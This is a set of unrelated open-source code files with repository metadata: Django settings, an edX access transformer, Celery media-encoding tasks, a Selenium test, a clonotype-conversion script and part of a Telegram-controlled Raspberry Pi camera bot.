'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.contrib.sites.middleware.CurrentSiteMiddleware',
]
ROOT_URLCONF = 'emojiweather.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [
os.path.join(BASE_DIR, 'templates'),
],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'emojiweather.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.0/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = [
os.path.join(BASE_DIR, 'static'),
]
# Sites
# https://docs.djangoproject.com/en/2.0/ref/contrib/sites/
SITE_ID = os.environ.get('SITE_ID', 1)
# Geolocation
# https://docs.djangoproject.com/en/2.0/ref/contrib/gis/geoip2/
# http://dev.maxmind.com/geoip/geoip2/geolite2/
GEOIP_PATH = os.path.join(BASE_DIR, 'utils', 'maxmind')
# Google Geocoding API
# https://developers.google.com/maps/documentation/geocoding/start
GOOGLE_GEOCODING_API_KEY = os.environ.get('GOOGLE_GEOCODING_API_KEY', '')
# Google Maps JavaScript API
# https://developers.google.com/maps/documentation/javascript/tutorial
GOOGLE_MAPS_API_KEY = os.environ.get('GOOGLE_MAPS_API_KEY', '')
# Dark Sky API
# https://darksky.net/dev/docs
DARK_SKY_API_KEY = os.environ.get('DARK_SKY_API_KEY', '')
# Mattermost API
# https://docs.mattermost.com/developer/slash-commands.html
# https://developers.mattermost.com/integrate/slash-commands/
# https://docs.mattermost.com/help/messaging/formatting-text.html
MATTERMOST_TOKEN_ASK = os.environ.get('MATTERMOST_TOKEN_ASK', '')
MATTERMOST_TOKEN_CHUCK = os.environ.get('MATTERMOST_TOKEN_CHUCK', '')
MATTERMOST_TOKEN_FACT = os.environ.get('MATTERMOST_TOKEN_FACT', '')
MATTERMOST_TOKEN_HOT = os.environ.get('MATTERMOST_TOKEN_HOT', '')
MATTERMOST_TOKEN_PRINT = os.environ.get('MATTERMOST_TOKEN_PRINT', '')
MATTERMOST_TOKEN_WEATHER = os.environ.get('MATTERMOST_TOKEN_WEATHER', '')
# Heroku
# https://devcenter.heroku.com/articles/django-app-configuration
django_heroku.settings(locals())
| mit | 5,700,339,176,886,210,000 | 24.255435 | 91 | 0.685388 | false |
cpennington/edx-platform | lms/djangoapps/course_blocks/transformers/start_date.py | 1 | 2952 | """
Start Date Transformer implementation.
"""
from lms.djangoapps.courseware.access_utils import check_start_date
from openedx.core.djangoapps.content.block_structure.transformer import (
BlockStructureTransformer,
FilteringTransformerMixin
)
from xmodule.course_metadata_utils import DEFAULT_START_DATE
from .utils import collect_merged_date_field
class StartDateTransformer(FilteringTransformerMixin, BlockStructureTransformer):
"""
A transformer that enforces the 'start' and 'days_early_for_beta'
fields on blocks by removing blocks from the block structure for
which the user does not have access. The 'start' field on a
block is percolated down to its descendants, so that all blocks
enforce the 'start' field from their ancestors. The assumed
'start' value for a block is then the maximum of its parent and its
own.
For a block with multiple parents, the assumed parent start date
value is a computed minimum of the start dates of all its parents.
So as long as one parent chain allows access, the block has access.
Staff users are exempted from visibility rules.
"""
WRITE_VERSION = 1
READ_VERSION = 1
MERGED_START_DATE = 'merged_start_date'
@classmethod
def name(cls):
"""
Unique identifier for the transformer's class;
same identifier used in setup.py.
"""
return "start_date"
@classmethod
def _get_merged_start_date(cls, block_structure, block_key):
"""
Returns the merged value for the start date for the block with
the given block_key in the given block_structure.
"""
return block_structure.get_transformer_block_field(
block_key, cls, cls.MERGED_START_DATE, False
)
@classmethod
def collect(cls, block_structure):
"""
Collects any information that's necessary to execute this
transformer's transform method.
"""
block_structure.request_xblock_fields('days_early_for_beta')
collect_merged_date_field(
block_structure,
transformer=cls,
xblock_field_name='start',
merged_field_name=cls.MERGED_START_DATE,
default_date=DEFAULT_START_DATE,
func_merge_parents=min,
func_merge_ancestors=max,
)
def transform_block_filters(self, usage_info, block_structure):
# Users with staff access bypass the Start Date check.
if usage_info.has_staff_access:
return [block_structure.create_universal_filter()]
removal_condition = lambda block_key: not check_start_date(
usage_info.user,
block_structure.get_xblock_field(block_key, 'days_early_for_beta'),
self._get_merged_start_date(block_structure, block_key),
usage_info.course_key,
)
return [block_structure.create_removal_filter(removal_condition)]
| agpl-3.0 | 5,717,390,971,665,340,000 | 34.566265 | 81 | 0.670054 | false |
stz-online/VVSPuentklichkeit | vvs_crawler/vvs_crawler/settings.py | 1 | 3315 | """
Django settings for vvs_crawler project.
For more information on this file, see
https://docs.djangoproject.com/en/1.7/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.7/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
from YamJam import yamjam
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
keys = yamjam("keys.yaml")
SECRET_KEY = keys['django_secret_key']
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATE_DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.gis',
'django_extensions',
'vvs_map',
'rest_framework'
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'vvs_crawler.urls'
WSGI_APPLICATION = 'vvs_crawler.wsgi.application'
BROKER_URL = 'redis://:{0}@localhost:6379/4'.format(keys["redis"]["password"])
# Database
# https://docs.djangoproject.com/en/1.7/ref/settings/#databases
from datetime import timedelta
CELERYBEAT_SCHEDULE = {
'add-every-30-seconds': {
'task': 'vvs_map.tasks.get_json',
'schedule': timedelta(seconds=30),
'args': ()
},
'update-names': {
'task': 'vvs_map.tasks.crawl_stop_names',
'schedule': timedelta(minutes=10),
'args': ()
},
}
DATABASES = {
'default': {
'ENGINE': 'django.contrib.gis.db.backends.postgis', # Add 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'.
'NAME': 'vvs_crawler', # Or path to database file if using sqlite3.
# The following settings are not used with sqlite3:
'USER': 'postgres',
'PASSWORD': '',
'HOST': 'localhost', # Empty for localhost through domain sockets or '127.0.0.1' for localhost through TCP.
'PORT': '', # Set to empty string for default.
}
}
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.db.DatabaseCache',
'LOCATION': 'cache_table_delays',
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.7/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Europe/Berlin'
USE_I18N = True
USE_L10N = True
USE_TZ = True
SHELL_PLUS = 'ipython'
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.7/howto/static-files/
STATIC_URL = '/static/'
TEMPLATE_DIRS = (
os.path.join(BASE_DIR, 'templates'),
)
| gpl-3.0 | 4,491,424,426,170,239,000 | 26.625 | 150 | 0.659729 | false |
kromain/chromium-tools | recipes/psdriver.py | 1 | 2297 | # Copyright (c) 2014 Sony Network Entertainment Intl. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import sys
import recipe_util # pylint: disable=F0401
# This class doesn't need an __init__ method, so we disable the warning
# pylint: disable=W0232
class PSDriver(recipe_util.Recipe):
"""Fetch recipe class for Sony's Chromium clones."""
@staticmethod
def fetch_spec(props):
url = '[email protected]:SNEI/chromium.git@refs/heads/psdriver'
custom_deps = { "src/tools/gyp" : "[email protected]:SNEI/gyp.git",
}
custom_hooks = [
# Run gyp on content_shell_and_tests.gyp instead off the default all.gyp, to reduce execution time.
# Also specify the content_shell target explicitely to reduce the size of the solution. (tests are filtered out)
{
"name": "gyp",
"pattern": ".",
"action": ["python", "src/build/gyp_chromium", "src/chrome/psdriver.gyp"],
},
# Next, disable all the hooks that pull in stuff we don't care about (see DEPS files for their descriptions)
{
"name": "nacltools",
},
{
"name": "sysroot",
},
{
"name": "clang",
},
{
"name": "gn_win",
},
{
"name": "gn_mac",
},
{
"name": "gn_linux",
},
{
"name": "gn_linux32",
},
{
"name": "clang_format_win",
},
{
"name": "clang_format_mac",
},
{
"name": "clang_format_linux",
},
{
"name": "binutils",
},
{
"name": "eu-strip",
},
]
solution = { 'name' :'src',
'url' : url,
'deps_file': '.DEPS.git',
'managed' : False,
'safesync_url': '',
'custom_deps': custom_deps,
'custom_hooks': custom_hooks,
}
spec = {
'solutions': [solution],
}
return {
'type': 'gclient_git',
'gclient_git_spec': spec,
}
@staticmethod
def expected_root(_props):
return 'src'
def main(argv=None):
return PSDriver().handle_args(argv)
if __name__ == '__main__':
sys.exit(main(sys.argv))
| bsd-3-clause | -7,069,908,839,805,119,000 | 22.927083 | 118 | 0.524597 | false |
collab-project/django-encode | encode/tasks.py | 1 | 4623 | # Copyright Collab 2012-2016
# See LICENSE for details.
"""
Tasks.
"""
from __future__ import unicode_literals
from celery import Task
from celery.utils.log import get_task_logger
from encode.models import MediaBase
from encode.util import fqn, short_path
from encode import EncodeError, UploadError
from encode.encoders import get_encoder_class
__all__ = ['EncodeMedia', 'StoreMedia']
logger = get_task_logger(__name__)
def media_base(obj_id):
"""
:param obj_id: The primary key of the :py:class:`~encode.models.MediaBase`
model.
:type obj_id: int
:rtype: :py:class:`~encode.models.MediaBase` instance
:returns: The :py:class:`~encode.models.MediaBase` instance in question.
"""
try:
# get the object by id
base = MediaBase.objects.get(pk=obj_id)
except MediaBase.DoesNotExist:
logger.error(
"Cannot encode: Media with pk '{0}' does not exist.".format(
obj_id), exc_info=True
)
raise
return base
class EncodeMedia(Task):
"""
Encode a :py:class:`~encode.models.MediaBase` model's ``input_file``.
"""
def run(self, profile, media_id, input_path, output_path):
"""
Execute the task.
:param profile: The :py:class:`~encode.models.EncodingProfile`
instance.
:type profile: :py:class:`~encode.models.EncodingProfile`
:param media_id: The primary key of the
:py:class:`~encode.models.MediaBase` model.
:type media_id: int
:param input_path:
:type input_path: str
:param output_path:
:type output_path:
:rtype: dict
:returns: Dictionary with ``id`` (media object's id) and ``profile``
(encoding profile instance).
"""
# find encoder
Encoder = get_encoder_class(profile.encoder.klass)
encoder = Encoder(profile, input_path, output_path)
logger.debug("***** New '{}' encoder job *****".format(profile))
logger.debug("Loading encoder: {0} ({1})".format(profile.encoder,
fqn(encoder)))
logger.debug("Encoder command: {0}".format(encoder.command))
logger.info("Encoder input file: {0}".format(
short_path(encoder.input_path)))
logger.info("Start encoding ({0}) - output file: {1}".format(
profile.mime_type,
short_path(encoder.output_path)),
# additional information for sentry
extra={
'encoder_profile': profile,
'encoder_name': profile.encoder,
'encoder_command': encoder.command,
'encoder_output': encoder.output_path
})
# start encoding
try:
encoder.start()
except EncodeError as error:
error_msg = "Encoding Media failed: {0}".format(
encoder.input_path)
logger.error(error_msg, exc_info=True, extra={
'output': error.output,
'command': error.command
})
raise
logger.debug("Completed encoding ({0}) - output file: {1}".format(
profile.mime_type, short_path(encoder.output_path)))
return {
"id": media_id,
"profile": profile
}
class StoreMedia(Task):
"""
Upload an instance :py:class:`~encode.models.MediaBase` model's
``output_files`` m2m field.
"""
#: If enabled the worker will not store task state and return values
#: for this task.
ignore_result = True
def run(self, data):
"""
Execute the task.
:param data:
:type data: dict
"""
media_id = data.get('id')
profile = data.get('profile')
base = media_base(media_id)
media = base.get_media()
logger.debug("Uploading encoded file: {0}".format(
short_path(media.output_path(profile))))
try:
# store the media object
media.store_file(profile)
except (UploadError, Exception) as exc:
# XXX: handle exception: SSLError('The read operation timed out',)
logger.error("Upload media failed: '{0}' - retrying ({1})".format(
media, exc), exc_info=True)
raise
logger.info("Upload complete: {0}".format(
short_path(media.output_path(profile))), extra={
'output_files': [x.file.url for x in media.output_files.all()],
})
# remove the original input file
if media.keep_input_file is False:
media.remove_file(profile)
| mit | -7,000,919,595,200,251,000 | 29.215686 | 78 | 0.574951 | false |
hugobarzano/NoInventory | Selenium/test_item_1.py | 1 | 3045 | # -*- coding: utf-8 -*-
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support.ui import Select
from selenium.common.exceptions import NoSuchElementException
from selenium.common.exceptions import NoAlertPresentException
import unittest, time, re
class ItemTest1(unittest.TestCase):
def setUp(self):
self.driver = webdriver.Firefox()
self.driver.implicitly_wait(30)
self.base_url = "http://noinventory.cloudapp.net"
self.verificationErrors = []
self.accept_next_alert = True
def test_item_test1(self):
driver = self.driver
driver.get(self.base_url + "/items")
driver.find_element_by_xpath("(//button[@type='button'])[2]").click()
driver.find_element_by_id("id_nombre_item").clear()
driver.find_element_by_id("id_nombre_item").send_keys("prueba selenium")
driver.find_element_by_id("id_descripcion_item").clear()
driver.find_element_by_id("id_descripcion_item").send_keys("descripcion del objeto con el que vamos a realizar las pruebas unitarias")
Select(driver.find_element_by_id("id_tag1")).select_by_visible_text("Facultad de Ciencias")
Select(driver.find_element_by_id("id_tag2")).select_by_visible_text("ORDENADOR CPU TORRE")
Select(driver.find_element_by_id("id_tag3")).select_by_visible_text("POR REVISAR")
driver.find_element_by_id("id_peso").clear()
driver.find_element_by_id("id_peso").send_keys("3.3")
driver.find_element_by_id("id_unidades").clear()
driver.find_element_by_id("id_unidades").send_keys("6")
Select(driver.find_element_by_id("id_tag1")).select_by_visible_text(u"Facultad de Psicología")
driver.find_element_by_name("submit").click()
driver.find_element_by_id("texto").clear()
driver.find_element_by_id("texto").send_keys("prueba seleni")
driver.find_element_by_id("busqueda").click()
driver.find_element_by_xpath("(//button[@type='button'])[3]").click()
self.assertRegexpMatches(self.close_alert_and_get_its_text(), r"^¿Estas seguro que deseas borrar los Items[\s\S]$")
def is_element_present(self, how, what):
try: self.driver.find_element(by=how, value=what)
except NoSuchElementException as e: return False
return True
def is_alert_present(self):
try: self.driver.switch_to_alert()
except NoAlertPresentException as e: return False
return True
def close_alert_and_get_its_text(self):
try:
alert = self.driver.switch_to_alert()
alert_text = alert.text
if self.accept_next_alert:
alert.accept()
else:
alert.dismiss()
return alert_text
finally: self.accept_next_alert = True
def tearDown(self):
self.driver.quit()
self.assertEqual([], self.verificationErrors)
if __name__ == "__main__":
unittest.main()
| gpl-3.0 | 6,154,920,643,843,559,000 | 44.41791 | 142 | 0.654946 | false |
BeenzSyed/tempest | tempest/api/orchestration/stacks/test_rackconnect.py | 1 | 5346 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from tempest.api.orchestration import base_multipleusers
from tempest.common.utils.data_utils import rand_name
from tempest.openstack.common import log as logging
from datetime import datetime
import requests
import yaml
import time
import os
import pdb
LOG = logging.getLogger(__name__)
class StacksTestJSON(base_multipleusers.BaseMultipleOrchestrationTest):
_interface = 'json'
empty_template = "HeatTemplateFormatVersion: '2013-05-23'\n"
@classmethod
def setUpClass(cls):
super(StacksTestJSON, cls).setUpClass()
def test_rackconnect_realDeployment(self):
self._test_stack_for_RackConnect("kitchen_sink")
def _send_deploy_time_graphite(self, region, template, deploy_time, buildfail):
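        # push the deploy duration (in minutes) to graphite via netcat, under a build or fail metric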
cmd = 'echo "heat.qa.build-tests.' + region + '.' + template \
+ '.' + buildfail + ' ' + str(deploy_time) \
+ ' `date +%s`" | ' \
'nc http://graphite.staging.rs-heat.com/ ' \
'2003 -q 2'
print cmd
os.system(cmd)
print "Deploy time sent to graphite"
def _test_stack_for_RackConnect(self, template):
user_rackconnect = self.managers[2]
region = self.config.orchestration['regions']
template_giturl = "https://raw.githubusercontent.com/heat-ci/heat-templates/master/prod/kitchen_sink.template"
response_templates = requests.get(template_giturl, timeout=3)
yaml_template = yaml.safe_load(response_templates.content)
stack_name = rand_name("sabeen"+template)
parameters = {}
if 'key_name' in yaml_template['parameters']:
parameters['key_name'] = 'sabeen'
if 'domain_name' in yaml_template['parameters']:
parameters['domain_name'] = "example%s.com" %datetime.now().microsecond
if 'git_url' in yaml_template['parameters']:
parameters['git_url'] = "https://github.com/timductive/phphelloworld"
print "\nDeploying %s in %s" % (template, region)
stack_identifier = self.create_stack(user_rackconnect, stack_name, region,
yaml_template, parameters)
#stack_identifier = self.create_stack(stack_name, region,
# yaml_template, parameters)
print stack_identifier
stack_id = stack_identifier.split('/')[1]
count = 0
resp, body = self.get_stack(user_rackconnect, stack_id, region)
print "Stack %s status is: %s, %s" % (stack_name, body['stack_status'], body['stack_status_reason'])
while body['stack_status'] == 'CREATE_IN_PROGRESS' and count < 90:
resp, body = self.get_stack(user_rackconnect,stack_id, region)
if resp['status'] != '200':
print "The response is: %s" % resp
self.fail(resp)
print "Deployment in %s status. Checking again in 1 minute" % body['stack_status']
time.sleep(60)
count += 1
if body['stack_status'] == 'CREATE_FAILED':
print "Stack create failed. Here's why: %s" % body['stack_status_reason']
print "Deleting the stack now"
resp, body = self.delete_stack(user_rackconnect,
stack_name, stack_id, region)
if resp['status'] != '204':
print "Delete did not work"
self._send_deploy_time_graphite(region, template, count, "failtime")
self.fail("Stack create failed")
if count == 90:
print "Stack create has taken over 90 minutes. Force failing now."
self._send_deploy_time_graphite(region, template, count, "failtime")
            resp, body = self.delete_stack(user_rackconnect, stack_name, stack_id, region)
if resp['status'] != '204':
print "Delete did not work"
self.fail("Stack create took too long")
if body['stack_status'] == 'CREATE_COMPLETE':
print "The deployment took %s minutes" % count
self._send_deploy_time_graphite(region, template, count, "buildtime")
#extract region and name of template
#delete stack
print "Deleting stack now"
resp, body = self.delete_stack(user_rackconnect, stack_name,
stack_id, region)
if resp['status'] != '204':
print "Delete did not work"
else:
print "Something went wrong! This could be the reason: %s" % body['stack_status_reason'] | apache-2.0 | 2,207,363,008,343,079,700 | 45.903509 | 118 | 0.587542 | false |
shengqh/ngsperl | lib/scRNA/clonotype_cell.py | 1 | 2601 | import argparse
import logging
import os
import sys
import re
import json
def initialize_logger(logfile, args):
logger = logging.getLogger('clonotype_cell')
loglevel = logging.INFO
logger.setLevel(loglevel)
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)-8s - %(message)s')
# create console handler and set level to info
handler = logging.StreamHandler()
handler.setLevel(loglevel)
handler.setFormatter(formatter)
logger.addHandler(handler)
  # create file handler and set level to info
handler = logging.FileHandler(logfile, "w")
handler.setLevel(loglevel)
handler.setFormatter(formatter)
logger.addHandler(handler)
return(logger)
def getValidFilename(s):
s = str(s).strip().replace(' ', '_')
return re.sub(r'(?u)[^-\w.]', '', s)
def runCommand(command, logger):
logger.info("run : " + command )
os.system(command)
def check_file(filename, parser):
if not os. path. isfile(filename):
print("error: file not exists: " + filename)
parser.print_help()
sys.exit(1)
def convert(json_file, output_file, logger):
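  # write one barcode/clonotype line per cell barcode, skipping non-cells and duplicates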
logger.info("reading %s" % json_file)
with open(output_file, "wt") as fout:
fout.write("barcode\tclonetype\n")
barcodes = set()
with open(json_file, "rt") as fin:
data = json.load(fin)
for record in data:
if record["is_cell"]:
if not record['barcode'] in barcodes:
fout.write("%s\t%s\n" % (record['barcode'], record['info']['raw_clonotype_id']))
barcodes.add(record['barcode'])
logger.info("written to %s" % output_file)
def main():
parser = argparse.ArgumentParser(description="Extract cell of clonotype",
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
DEBUG = True
NOT_DEBUG = not DEBUG
parser.add_argument('-i', '--input', action='store', nargs='?', help="Input clone type json file", required=NOT_DEBUG)
parser.add_argument('-o', '--output', action='store', nargs='?', help="Output clone type cell file")
if not DEBUG and len(sys.argv)==1:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
if DEBUG:
args.input="/data/h_vangard_1/alexander_gelbard_data/AG_3669_10X_cellranger4/VDJ/3669-AG-6/all_contig_annotations.json"
args.output="/data/h_vangard_1/alexander_gelbard_data/AG_3669_10X_cellranger4/VDJ/3669-AG-6/all_contig_annotations.json.txt"
check_file(args.input, parser)
logger = initialize_logger(args.output + ".log", args)
convert(args.input, args.output, logger)
if __name__ == "__main__":
main()
| apache-2.0 | 192,097,637,951,968,420 | 30.337349 | 128 | 0.666282 | false |
scaidermern/piCamBot | piCamBot.py | 1 | 23669 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# dependencies:
# - https://github.com/python-telegram-bot/python-telegram-bot
# - https://github.com/dsoprea/PyInotify
#
# similar project:
# - https://github.com/FutureSharks/rpi-security/blob/master/bin/rpi-security.py
#
# - todo:
# - configurable log file path
# - check return code of raspistill
#
import importlib
import inotify.adapters
import json
import logging
import logging.handlers
import os
import queue
import shlex
import shutil
import signal
import subprocess
import sys
import threading
import time
from telegram.error import NetworkError, Unauthorized
from telegram.ext import Updater, MessageHandler, Filters
class piCamBot:
def __init__(self):
# config from config file
self.config = None
# logging stuff
self.logger = None
# check for motion and send captured images to owners?
self.isArmed = False
# telegram bot updater
self.updater = None
# perform movement detection via PIR?
self.hasPIR = False
# perform movement detection via motion software?
self.useMotion = False
# GPIO module, dynamically loaded depending on config
self.GPIO = None
# are we currently shutting down?
self.isShuttingDown = False
# buzzer enabled?
self.hasBuzzer = False
# queue of sequences to play via buzzer
self.buzzerQueue = None
# turn on LED(s) during image capture?
self.hasCaptureLED = False
# GPIO output for capture LED(s)
self.captureLEDgpio = None
# state of capture LED (on/off)
self.isCaptureLEDOn = False
def run(self):
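        # main entry point: run the bot and always perform cleanup on exit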
try:
self.runInternal()
finally:
self.cleanup()
def runInternal(self):
# setup logging, we want to log both to stdout and a file
logFormat = logging.Formatter('%(asctime)s - %(levelname)s - %(message)s')
self.logger = logging.getLogger(__name__)
fileHandler = logging.handlers.TimedRotatingFileHandler(filename='picam.log', when='midnight', backupCount=7)
fileHandler.setFormatter(logFormat)
self.logger.addHandler(fileHandler)
stdoutHandler = logging.StreamHandler(sys.stdout)
stdoutHandler.setFormatter(logFormat)
self.logger.addHandler(stdoutHandler)
self.logger.setLevel(logging.INFO)
self.logger.info('Starting')
# register signal handler
signal.signal(signal.SIGHUP, self.signalHandler)
signal.signal(signal.SIGINT, self.signalHandler)
signal.signal(signal.SIGQUIT, self.signalHandler)
signal.signal(signal.SIGTERM, self.signalHandler)
try:
            with open('config.json', 'r') as configFile:
                self.config = json.load(configFile)
except:
self.logger.exception('Could not parse config file:')
sys.exit(1)
self.hasPIR = self.config['pir']['enable']
self.useMotion = self.config['motion']['enable']
self.hasBuzzer = self.config['buzzer']['enable']
self.hasCaptureLED = self.config['capture']['led']['enable']
# check for conflicting config options
if self.hasPIR and self.useMotion:
self.logger.error('Enabling both PIR and motion based capturing is not supported')
sys.exit(1)
# check if we need GPIO support
if self.hasBuzzer or self.hasPIR or self.hasCaptureLED:
self.GPIO = importlib.import_module('RPi.GPIO')
self.GPIO.setmode(self.GPIO.BCM)
if self.hasCaptureLED:
self.captureLEDgpio = self.config['capture']['led']['gpio']
self.GPIO.setup(self.captureLEDgpio, self.GPIO.OUT)
# set default state
self.isArmed = self.config['general']['arm']
self.updater = Updater(self.config['telegram']['token'])
dispatcher = self.updater.dispatcher
bot = self.updater.bot
# check if API access works. try again on network errors,
# might happen after boot while the network is still being set up
self.logger.info('Waiting for network and Telegram API to become accessible...')
telegramAccess = False
timeout = self.config['general']['startup_timeout']
timeout = timeout if timeout > 0 else sys.maxsize
for i in range(timeout):
try:
self.logger.info(bot.get_me())
self.logger.info('Telegram API access working!')
telegramAccess = True
break # success
except NetworkError as e:
pass # don't log network errors, just ignore
except Unauthorized as e:
# probably wrong access token
self.logger.exception('Error while trying to access Telegram API, wrong Telegram access token?')
raise
except:
# unknown exception, log and then bail out
self.logger.exception('Error while trying to access Telegram API:')
raise
time.sleep(1)
if not telegramAccess:
self.logger.error('Could not access Telegram API within time, shutting down')
sys.exit(1)
# pretend to be nice to our owners
ownerIDs = self.config['telegram']['owner_ids']
for ownerID in ownerIDs:
try:
bot.sendMessage(chat_id=ownerID, text='Hello there, I\'m back!')
except:
# most likely network problem or user has blocked the bot
self.logger.exception('Could not send hello to user %s:' % ownerID)
threads = []
# set up watch thread for captured images
image_watch_thread = threading.Thread(target=self.watchImageDir, name="Image watch")
image_watch_thread.daemon = True
image_watch_thread.start()
threads.append(image_watch_thread)
# set up PIR thread
if self.hasPIR:
pir_thread = threading.Thread(target=self.watchPIR, name="PIR")
pir_thread.daemon = True
pir_thread.start()
threads.append(pir_thread)
# set up buzzer thread
if self.hasBuzzer:
buzzer_thread = threading.Thread(target=self.watchBuzzerQueue, name="buzzer")
buzzer_thread.daemon = True
buzzer_thread.start()
threads.append(buzzer_thread)
# register message handler and start polling
# note: we don't register each command individually because then we
        # wouldn't be able to check the ownerID; instead we register for text
# messages
dispatcher.add_handler(MessageHandler(Filters.text, self.performCommand))
self.updater.start_polling()
while True:
time.sleep(1)
# check if all threads are still alive
for thread in threads:
                if thread.is_alive():
continue
# something went wrong, bailing out
msg = 'Thread "%s" died, terminating now.' % thread.name
self.logger.error(msg)
for ownerID in ownerIDs:
try:
bot.sendMessage(chat_id=ownerID, text=msg)
except:
self.logger.exception('Exception while trying to notify owners:')
pass
sys.exit(1)
def performCommand(self, update, context):
message = update.message
if message is None:
return
# skip messages from non-owner
if message.from_user.id not in self.config['telegram']['owner_ids']:
self.logger.warning('Received message from unknown user "%s": "%s"' % (message.from_user, message.text))
message.reply_text("I'm sorry, Dave. I'm afraid I can't do that.")
return
self.logger.info('Received message from user "%s": "%s"' % (message.from_user, message.text))
cmd = update.message.text.lower().rstrip()
if cmd == '/start':
self.commandHelp(update)
elif cmd == '/arm':
self.commandArm(update)
elif cmd == '/disarm':
self.commandDisarm(update)
elif cmd == '/kill':
self.commandKill(update)
elif cmd == '/status':
self.commandStatus(update)
elif cmd == '/capture':
# if motion software is running we have to stop and restart it for capturing images
stopStart = self.isMotionRunning()
if stopStart:
self.commandDisarm(update)
self.commandCapture(update)
if stopStart:
self.commandArm(update)
elif cmd == '/ledtoggle':
self.commandLEDToggle(update)
elif cmd == '/ledstatus':
self.commandLEDStatus(update)
elif cmd == '/buzzer':
self.commandBuzzer(update)
elif cmd == '/help':
self.commandHelp(update)
else:
message.reply_text('Unknown command.')
self.logger.warning('Unknown command: "%s"' % update.message.text)
def commandArm(self, update):
message = update.message
if self.isArmed:
message.reply_text('Motion-based capturing already enabled! Nothing to do.')
return
if not self.hasPIR and not self.useMotion:
message.reply_text('Error: Cannot enable motion-based capturing since neither PIR nor motion is enabled!')
return
message.reply_text('Enabling motion-based capturing...')
if self.hasBuzzer:
sequence = self.config['buzzer']['seq_arm']
if len(sequence) > 0:
self.buzzerQueue.put(sequence)
self.isArmed = True
if not self.useMotion:
# we are done, PIR-mode needs no further steps
return
# start motion software if not already running
if self.isMotionRunning():
message.reply_text('Motion software already running.')
return
motionCmd = shlex.split(self.config['motion']['cmd'])
try:
subprocess.call(motionCmd)
except:
self.logger.exception('Failed to start motion software:')
message.reply_text('Error: Failed to start motion software. See log for details.')
return
# wait until motion is running to prevent
# multiple start and wrong status reports
for i in range(10):
if self.isMotionRunning():
message.reply_text('Motion software now running.')
return
time.sleep(1)
message.reply_text('Motion software still not running. Please check status later.')
def commandDisarm(self, update):
message = update.message
if not self.isArmed:
message.reply_text('Motion-based capturing not enabled! Nothing to do.')
return
message.reply_text('Disabling motion-based capturing...')
if self.hasBuzzer:
sequence = self.config['buzzer']['seq_disarm']
if len(sequence) > 0:
self.buzzerQueue.put(sequence)
self.isArmed = False
if not self.useMotion:
# we are done, PIR-mode needs no further steps
return
pid = self.getMotionPID()
if pid is None:
message.reply_text('No PID file found. Assuming motion software not running. If in doubt use "kill".')
return
if not os.path.exists('/proc/%s' % pid):
message.reply_text('PID found but no corresponding proc entry. Removing PID file.')
os.remove(self.config['motion']['pid_file'])
return
try:
os.kill(pid, signal.SIGTERM)
except OSError:
            # ignore if already gone
pass
# wait for process to terminate, can take some time
for i in range(10):
